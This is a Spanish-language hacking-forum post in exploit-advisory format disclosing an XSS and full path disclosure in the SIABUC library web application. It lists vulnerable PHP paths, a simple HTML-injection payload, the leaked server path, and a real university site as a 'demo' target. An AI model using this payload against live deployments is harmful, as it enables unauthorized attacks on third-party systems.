Xss & Full path Disclosure WebApp Library SIABUC

  • 0 Respuestas
  • 2824 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado MaztoR

  • *
  • Underc0der
  • Mensajes: 56
  • Actividad:
    0%
  • Reputación 0
  • Skype: Maztor-
    • Ver Perfil
    • MaztoR [IN]-Security
    • Email

Xss & Full path Disclosure WebApp Library SIABUC

  • en: Julio 07, 2012, 03:41:09 am
# Author: Mazt0r
# Exploit Title: XSS & Full Path Disclosure SIABUC
# Date: 24/02/2012
# software: SIABUC
# link: http://siabuc.ucol.mx/
# Version: Version 1.2 [Other versions "NO TESTED"]
# Category: webapps Library
# Tested on: Linux

Demo:http://www.cidcacs.iis.ucr.ac.cr/

----------------
Vulnerable
----------------
/reservacion/index.php
/reservacion/include/buscar.php

Exploit:
======================

http://localhost/reservacion/index.php

POST: XSS
Result: /reservacion/include/buscar.php
======================
Example:
======================

|---------------------|
|" > < h1 > A < / h1 >|
|---------------------|
\
- Execution Code

Result FPD: Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***


"© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"

----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
-------------------------------------
| Twitter: @Mazt0r                
| Site: www.maztor.com        
| Skype: Maztor-                    
-------------------------------------

 

XSS full

Iniciado por morodog

Respuestas: 8
Vistas: 11861
Último mensaje Abril 26, 2019, 07:42:59 pm
por KiddArabic
Codeando un exploit I: Source Code Disclosure

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2905
Último mensaje Febrero 24, 2010, 03:28:43 pm
por dracko.rx
[Tutorial] Source Code Disclosure

Iniciado por arthusu

Respuestas: 0
Vistas: 2475
Último mensaje Julio 22, 2013, 10:58:42 pm
por arthusu
Obteniendo Path Disclosures

Iniciado por Dedalo

Respuestas: 0
Vistas: 2684
Último mensaje Junio 23, 2012, 03:18:42 am
por Dedalo
Full Source Disclosure [Tutorial Basico]

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 4015
Último mensaje Mayo 08, 2012, 05:49:49 pm
por baron.power